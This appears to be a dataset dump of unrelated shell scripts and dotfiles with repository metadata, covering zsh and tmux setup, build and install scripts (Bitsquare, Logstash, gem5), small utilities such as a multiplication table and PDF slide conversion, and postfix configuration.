# - atload - command to run when the plugin finishes loading
# - lucid - skip `Loaded ...` message
#
# refs:
# - https://github.com/zdharma/zplugin#ice-modifiers
# - http://zdharma.org/zplugin/wiki/INTRODUCTION/#some_ice-modifiers
# TODO: install `fzf` & `fasd` with `zplugin`?
# ref - search zsh-autosuggestions
# http://zdharma.org/zplugin/wiki/GALLERY/#plugins
zplugin ice wait lucid atload'_zsh_autosuggest_start'
zplugin light zsh-users/zsh-autosuggestions
# ref - search fast-syntax-highlighting
# http://zdharma.org/zplugin/wiki/GALLERY/#plugins
zplugin ice wait lucid atinit"ZPLGM[COMPINIT_OPTS]=-C; zpcompinit; zpcdreplay"
zplugin light zdharma/fast-syntax-highlighting
# synchronize system clipboard
# theoretically you might need to source this after other keymappings, have not
# yet seen a need for enforcing that
zplugin ice wait lucid
zplugin light kutsan/zsh-system-clipboard
# similar to `jk/`, convenient when query already typed out
# ref - https://github.com/zsh-users/zsh-history-substring-search
zplugin light zsh-users/zsh-history-substring-search
# prompt
# ref - https://github.com/romkatv/powerlevel10k#zplugin
zplugin ice depth=1
zplugin light romkatv/powerlevel10k
# provide `yarn remove` & `yarn add` completions
# TODO: make this async
# zplugin ice wait lucid
zplugin light buonomo/yarn-completion
# TODO: figure this out
# type `fuck` to correct last typed command
# zplugin ice wait lucid
# zplugin light laggardkernel/zsh-thefuck
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< end of plugins >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# <<<<<<<<<<<<<<<<<<<<<<<<<<< start of plugin config >>>>>>>>>>>>>>>>>>>>>>>>>>>
# <<<< syntax highlighting >>>>
# TODO: understand why this doesn't seem to be working
# refs:
# - https://github.com/zsh-users/zsh-syntax-highlighting/blob/master/docs/highlighters/main.md
# - https://github.com/zsh-users/zsh-syntax-highlighting/blob/master/docs/highlighters.md
typeset -A ZSH_HIGHLIGHT_STYLES
ZSH_HIGHLIGHT_STYLES[comment]='fg=magenta'
ZSH_HIGHLIGHT_STYLES[alias]='fg=magenta,bold'
# <<<< autosuggestions >>>>
# ref - https://github.com/zsh-users/zsh-autosuggestions#configuration
ZSH_AUTOSUGGEST_HIGHLIGHT_STYLE='fg=244' # light grey
ZSH_AUTOSUGGEST_USE_ASYNC=true # can be set to anything
# in the future consider testing `completion` strategy on feature branch
# ref - https://github.com/zsh-users/zsh-autosuggestions/compare/features/completion-suggestions
ZSH_AUTOSUGGEST_STRATEGY=(history)
# << keymappings >>
# ref - https://github.com/zsh-users/zsh-autosuggestions#key-bindings
# accept until end of line (same as right arrow)
bindkey '^e' autosuggest-accept
# accept until end of line and immediately execute
bindkey '^ ' autosuggest-execute
# accept next word
bindkey '^w' vi-forward-word
# <<<< history-substring-search >>>>
# << keymappings >>
bindkey '^u' history-substring-search-up
bindkey '^y' history-substring-search-down
# <<< zsh-system-clipboard
# https://github.com/kutsan/zsh-system-clipboard#options
typeset -g ZSH_SYSTEM_CLIPBOARD_TMUX='true'
# <<<<<<<<<<<<<<<<<<<<<<<<<<<< end of plugin config >>>>>>>>>>>>>>>>>>>>>>>>>>>>
| true
|
f44d24498e10cc28b51dbd16f16824d7d0bc6952
|
Shell
|
lxy117/test
|
/4shell_5.sh
|
UTF-8
| 315
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
for ((i=1;i<=9;i++))
do
for ((j=1;j<=9;j++))
do
if [ $j -lt $i ]
then
num=$((i*j))
echo -n $i*$j=$num$'\t'
fi
if [ $j -eq $i ]
then
num=$((i*j))
echo $i*$j=$num
fi
done
done
| true
|
aed79be6e194a05b2d82069c85474a6140f5cc8b
|
Shell
|
WorkflowCenter-Repositories/Core-LifecycleScripts
|
/Lib-install.sh
|
UTF-8
| 1,013
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
CONTAINER_NAME=$1
Lib_URL=$2
Lib_name=$(ctx node properties lib_name)
Lib_path=$(ctx node properties lib_path)
sudo docker exec -it ${CONTAINER_NAME} test -f $Lib_path/$Lib_name || test -f $Lib_name && exit 0
set +e
Wget=$(sudo docker exec -it ${CONTAINER_NAME} which wget)
set -e
if [[ -z ${Wget} ]]; then
sudo docker exec -it ${CONTAINER_NAME} apt-get update
sudo docker exec -it ${CONTAINER_NAME} apt-get -y install Wget
fi
sudo docker exec -it ${CONTAINER_NAME} test -d $Lib_path && sudo docker exec -it ${CONTAINER_NAME} rm -rf $Lib_path
file_name=$(basename "$Lib_URL")
sudo docker exec -it ${CONTAINER_NAME} test ! -f $file_name && sudo docker exec -it ${CONTAINER_NAME} wget ${Lib_URL}
tar="tar.gz"
set +e
sudo docker exec -it ${CONTAINER_NAME} test "${file_name#*$tar}" != "$file_name" && sudo docker exec -it ${CONTAINER_NAME} tar -zxvf $file_name
sudo docker exec -it ${CONTAINER_NAME} chmod -R 777 $Lib_path/$Lib_name
set -e
| true
|
750f69daf9a317d53a8509e8c6c37e829f6a401a
|
Shell
|
leoylung/misc
|
/.zshrc
|
UTF-8
| 2,197
| 2.84375
| 3
|
[] |
no_license
|
# Path to your oh-my-zsh installation.
export ZSH="/Users/leolung/.oh-my-zsh"
ZSH_THEME="leolung"
# Which plugins would you like to load?
# Standard plugins can be found in ~/.oh-my-zsh/plugins/*
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
# Add wisely, as too many plugins slow down shell startup.
plugins=(git)
source $ZSH/oh-my-zsh.sh
# User configuration
export LESS="-F -X $LESS"
# git aliases
# idempotent
alias gs='git status'
alias gl='git log --pretty=format:"'"%C(yellow)%h %Cred%ad (%cr) %Cblue%an%Cgreen%d %Creset%s"'" --date=local'
alias gla='git log --graph --all --decorate --pretty=format:"'"%C(yellow)%h %Cred%ad (%cr) %Cblue%an%Cgreen%d %Creset%s"'" --date=local'
alias gd='git diff'
alias gdn='git diff --name-only'
alias gdm='git diff origin/master'
alias gdnm='git diff --name-only origin/master'
# committing
alias ga='git add'
alias gcm='git commit -m'
alias gam='git commit --amend'
# remote
alias gf='git fetch'
alias grom='git rebase origin/master'
alias gmom='git merge origin/master'
# branching
alias gb='git branch'
alias gco='git checkout'
# tmux
tmuxquad() {
tmux splitw -h -p 50 -t 0
tmux splitw -v -p 50 -t 0
tmux selectp -t 0
tmux splitw -v -p 50 -t 2
tmux selectp -t 0
}
tmuxvsplit() {
tmux splitw -h -p 50 -t 0
tmux splitw -v -p 50 -t 1
tmux splitw -v -p 50 -t 1
tmux selectp -t 0
}
tmuxhsplit() {
tmux splitw -v -p 50 -t 0
tmux selectp -t 0
}
# android
alias adbt='adb shell input text'
# Fix numeric keypad
# 0 . Enter
bindkey -s "^[Op" "0"
bindkey -s "^[On" "."
bindkey -s "^[OM" "^M"
# 1 2 3
bindkey -s "^[Oq" "1"
bindkey -s "^[Or" "2"
bindkey -s "^[Os" "3"
# 4 5 6
bindkey -s "^[Ot" "4"
bindkey -s "^[Ou" "5"
bindkey -s "^[Ov" "6"
# 7 8 9
bindkey -s "^[Ow" "7"
bindkey -s "^[Ox" "8"
bindkey -s "^[Oy" "9"
# + - * / =
bindkey -s "^[Ol" "+"
bindkey -s "^[Om" "-"
bindkey -s "^[Oj" "*"
bindkey -s "^[Oo" "/"
bindkey -s "^[OX" "="
| true
|
81be1c63beceb8c41c58eb68cc73bf5a8bea07d7
|
Shell
|
surendrabvv/hacker-rank-practice
|
/LinuxShell/Bash/ComputeTheAverage.sh
|
UTF-8
| 268
| 3.140625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
## Problem : https://www.hackerrank.com/challenges/bash-tutorials---compute-the-average/problem
readarray -t arr
count="${arr[0]}"
unset arr[0]
for value in ${arr[@]}; do
((sum+=value))
done
a="$(echo "scale=8; $sum/$count" | bc)"
printf '%0.3f\n' "$a"
| true
|
5f5b96624240341c870d0b452c9f2463e20bae1f
|
Shell
|
aKhalili147/Image-processing
|
/resize.sh
|
UTF-8
| 288
| 3.328125
| 3
|
[] |
no_license
|
#! /bin/sh
# move output files to folders
rm -rf resized strip
mkdir -p resized strip
for file in $(ls | grep _resized); do
mv $file resized/$file
done
for file in $(ls | grep _strip); do
mv $file strip/$file
done
./extractStrip -m $(find `pwd`/strip -iname *strip*.bmp | sort -V)
| true
|
15a1e9899df089bc85ec76452c2c42da1578900d
|
Shell
|
IPv6-mPvD/pvdd
|
/tests/pvdid-set-attribute.sh
|
UTF-8
| 272
| 2.875
| 3
|
[] |
no_license
|
#!/bin/sh
. `dirname $0`/check-nc.sh
if [ $# != 3 ]
then
echo "usage : $0 pvdname attrName attrValue"
exit 1
fi
{
echo PVD_CONNECTION_PROMOTE_CONTROL
echo PVD_BEGIN_TRANSACTION "$1"
echo PVD_SET_ATTRIBUTE "$@"
echo PVD_END_TRANSACTION "$1"
} | $NC 0.0.0.0 10101
| true
|
7cfbb92b2192519d15391ed0ed8a6a3c859784a7
|
Shell
|
PiyushMattoo/openshift-log-cartridge_stg
|
/bin/install
|
UTF-8
| 830
| 2.640625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -e
source $OPENSHIFT_CARTRIDGE_SDK_BASH
LOGSTASH_VERSION='1.5.0'
LOGSTASH_NAME="logstash-${LOGSTASH_VERSION}"
LOGSTASH_URL="https://git.labs.dell.com/projects/BD/repos/logstash-output-batched_http/browse/artifacts/${LOGSTASH_NAME}.tar.gz?raw"
cd ${OPENSHIFT_DATA_DIR}
wget ${LOGSTASH_URL}
tar -xzf ${LOGSTASH_NAME}.tar.gz?raw
mv ${LOGSTASH_NAME} logstash
rm ${LOGSTASH_NAME}.tar.gz?raw
#Create Logging Application
curl -X POST -H "content-type: application/json" -u ${OPENSHIFT_DORADUS_USER}:${OPENSHIFT_DORADUS_PWD} -d '{"LoggingApplication": { "tables": {"Logs": { "fields": {"Timestamp": {"type": "timestamp"},"LogLevel": {"type": "text"},"Message": {"type": "text"}, "Source": {"type": "text"}}}}}}' http://${OPENSHIFT_DORADUS_HOST}:${OPENSHIFT_DORADUS_PORT}/_applications?tenant=${OPENSHIFT_DORADUS_TENANT}
| true
|
206b637b77ba2b50e741b2d0f14a05fd2795116a
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/bitsquare/PKGBUILD
|
UTF-8
| 1,967
| 2.703125
| 3
|
[] |
no_license
|
# Maintainer: David Parrish <daveparrish@tutanota.com>
pkgname=bitsquare
pkgver=0.4.9.9.3
pkgrel=1
pkgdesc="Cross-platform desktop application that allows users to trade national currency (dollars, euros, etc) for bitcoin without relying on centralized exchanges"
arch=('any')
url="https://bitsquare.io/"
license=('AGPL3')
depends=('java-openjfx')
makedepends=('maven' 'jdk8-openjdk')
source=("${pkgname}::git+https://github.com/bitsquare/bitsquare.git#tag=v${pkgver}"
"git+https://github.com/bitsquare/bitcoinj.git#commit=3a2e6baae74e4ed8d20edf73a2914297cde47f6c"
"bitsquare.sh"
"bitsquare.desktop")
sha256sums=('SKIP'
'SKIP'
'95a61502d44523c983549d6bf3deb81dc49fef490a187d28fd16e024c2d3e2aa'
'15592a05a2a4d6cb65c757e9eec5e3818bf38e7397a3b98e7651a8a3b51f9ba9')
build() {
# Use a temporary local maven repository.
local mvn_repo="$srcdir/mvn-repository"
cd "${srcdir}/bitcoinj"
echo "Building bitcoinj ..."
mvn clean install -Dmaven.repo.local="$mvn_repo" -DskipTests -Dmaven.javadoc.skip=true
cd "${srcdir}/${pkgname}"
echo "Building bitsquare ..."
mvn clean package -Dmaven.repo.local="$mvn_repo" -DskipTests
}
package() {
# Install executable.
install -D -m755 "bitsquare.sh" "${pkgdir}/usr/bin/bitsquare"
install -D -m644 "${srcdir}/${pkgname}/gui/target/shaded.jar" "${pkgdir}/usr/share/java/bitsquare/shaded.jar"
# Install desktop launcher.
install -Dm644 bitsquare.desktop "${pkgdir}/usr/share/applications/bitsquare.desktop"
install -Dm644 "${srcdir}/${pkgname}/package/linux/icon.png" "${pkgdir}/usr/share/pixmaps/bitsquare.png"
# Install BouncyCastleProvider
# https://github.com/bitsquare/bitsquare/blob/master/doc/build.md#3-copy-the-bountycastle-provider-jar-file
local mvn_repo="$srcdir/mvn-repository"
install -Dm644 "$mvn_repo/org/bouncycastle/bcprov-jdk15on/1.53/bcprov-jdk15on-1.53.jar" \
"${pkgdir}/usr/lib/jvm/java-8-openjdk/jre/lib/ext/bcprov-jdk15on-1.53.jar"
}
| true
|
07aa49e69ed1c228ff25f6f64ed5da1948804a52
|
Shell
|
MejiroSilence/UCLA-CS251A-Advanced-Computer-Architecture
|
/HW3_Gem5_Instruction_Hacking/run.sh
|
UTF-8
| 432
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
GEM5_BASE=~/gem5
TARGET=/root/gem5/configs/example/se.py
SRC_DIR=$(pwd)
rm -rf result; mkdir result
gcc -S test.c
gcc -o test test.c
cd $GEM5_BASE
build/X86/gem5.opt ${TARGET} \
--cmd=${SRC_DIR=$(pwd)}/test \
--cpu-type=DerivO3CPU \
--l1d_size=64kB --l1i_size=64kB --caches \
--l2_size=2MB --l2cache \
--sys-clock=1GHz --cpu-clock=1GHz \
--mem-type=DDR3_1600_8x8
cp m5out/* ${SRC_DIR}/result
| true
|
00e19ca071c24eeb45ad3bf6f3e6d9f1a4d44ab3
|
Shell
|
TrustHenry/environments
|
/servers/na-002/setup.sh
|
UTF-8
| 438
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
## Setup the nodes running on this server
set -xeu
set -o pipefail
SELF_PATH=$(cd $(dirname "${BASH_SOURCE[0]}") && pwd)
cp -Rv ${SELF_PATH}/srv /
cp -Rv ${SELF_PATH}/../common/usr /
mkdir -p /srv/stoa/
systemctl daemon-reload
systemctl enable agora@6.service
systemctl enable agora@7.service
# systemctl enable stoa.service
systemctl start agora@6.service
systemctl start agora@7.service
#systemctl start stoa.service
| true
|
b3f7eb1e4741b27fe09ef1a4a675d73e5e414024
|
Shell
|
Clareee1/COMP2041_20T2
|
/lab/lab05/snapshot-load.sh
|
UTF-8
| 388
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/dash
snapshot-save.sh
num="$1";
echo "Restoring snapshot $num"
curr="./.snapshot.$num"
for file in *
do
if (echo "$file"|egrep "^\.">/dev/null) #ignore name starts with .
then
continue;
fi
if [ $file = "snapshot-save.sh" ] || [ $file = "snapshot-load.sh" ] || [ $file = "*" ]
then
continue;
fi
cp "$curr/$file" "$file"
done
| true
|
d8bfd4dee639dfc0c10675ad9de97c861de38b9d
|
Shell
|
rishabhrbs96/slide_transition_detection
|
/code/convert_pdf.sh
|
UTF-8
| 654
| 2.96875
| 3
|
[] |
no_license
|
rm -f inter*
rm -f slide*
rm -f common*
convert -density 300 document.pdf slide%d.jpg
counter=0
pages=$(pdfinfo document.pdf | grep Pages | awk '{print $2}')
((pages--))
until [ $counter -gt $pages ]
do
#echo $counter
ffmpeg -i slide$(echo $counter).jpg -vf scale=640:360 inter$(echo $counter).jpg
#ffmpeg -i image$(echo $counter).jpg -vf format=gray gray$(echo $counter).jpg
ffmpeg -i inter$(echo $counter).jpg -vf "eq=contrast=1.0:brightness=-0.05:saturation=0.75" common$(echo $counter).jpg
rm -f inter$(echo $counter).jpg
rm -f slide$(echo $counter).jpg
((counter++))
done
#ffmpeg -i $($b).jpg -vf scale=640:360 image$($b).jpg
#rm inter*
#rm slide*
| true
|
e4a11f7effec4f939c94dccce619d32389b63e3d
|
Shell
|
sidspencer/xmd-cli
|
/linux/setxmd
|
UTF-8
| 717
| 3.203125
| 3
|
[] |
no_license
|
#! /bin/bash
KWS="$1"
FILES=${@:2}
#if [[ $1 =~ \-\-fromtags ]]; then
#TAGS=$(/usr/local/bin/tag --list "${FILES}" | sed -E "s/.*[[:space:]]//")
#
#echo "Setting xmd from tags: ${TAGS}"
#
#/usr/local/bin/exiftool -overwrite_original_in_place -Subject="${TAGS}" -Keywords="${TAGS}" "${FILES}"
#else
#if [[ $1 =~ \-\-fromxmd ]]; then
#TAGS=$(/usr/local/bin/exiftool -S -Keywords "${FILES}" | sed -e "s/Keywords: //")
#
#echo "Setting tags from xmd: ${TAGS}"
#
#/usr/local/bin/tag --set "${TAGS}" "${FILES}"
#else
echo "Setting xmd: ${KWS}"
/usr/local/bin/exiftool -overwrite_original_in_place -Subject="${KWS}" -Keywords="${KWS}" "${@:2}"
#fi
#fi
| true
|
2531be38d8262ed0b588512d944f6bd0c35f4fd0
|
Shell
|
MichaelDaum/vagrant-foswiki
|
/scripts/configure-postfix.sh
|
UTF-8
| 528
| 3.015625
| 3
|
[] |
no_license
|
echo "configuring postfix"
hostname=$1
mail_relay_host=$2
mail_root_alias=$3
domain=${hostname#*.}
postfix_conf="/etc/postfix/main.cf"
if grep -q "added by vagrant" $postfix_conf; then
echo "... already configured, skipping"
exit
fi
cat <<HERE>> $postfix_conf
### added by vagrant
alias_maps = hash:/etc/postfix/aliases
alias_database = hash:/etc/postfix/aliases
myhostname = $hostname
mydomain = $domain
biff = no
# relayhost = todo
HERE
newaliases
service postfix restart >/dev/null
rc-update -q add postfix default
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.